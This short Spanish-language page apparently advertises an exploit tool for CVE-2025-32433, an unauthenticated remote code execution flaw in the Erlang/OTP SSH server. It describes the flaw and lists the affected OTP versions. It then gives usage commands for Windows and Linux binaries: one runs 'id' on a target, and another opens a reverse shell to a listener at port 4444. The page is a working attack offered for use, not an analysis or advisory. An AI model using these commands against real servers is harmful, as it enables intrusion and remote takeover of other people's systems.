
CVE-2025-32433 Erlang/OTP Exploit RCE SSH Exploit SSH de ejecución remota de código
Se ha identificado una vulnerabilidad grave en el servidor SSH de Erlang/OTP que puede permitir a un atacante realizar ejecución remota de código (RCE) sin autenticación. Al explotar una falla en el manejo de mensajes del protocolo SSH, un actor malicioso podría obtener acceso no autorizado a los sistemas afectados y ejecutar comandos arbitrarios sin credenciales válidas. Esto podría llevar al compromiso de dichos hosts, permitiendo acceso no autorizado y manipulación de datos sensibles por parte de terceros, o ataques de denegación de servicio.
OTP-27.3.2 y anteriores
OTP-26.2.5.10 y anteriores
OTP-25.3.2.19 y anteriores
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
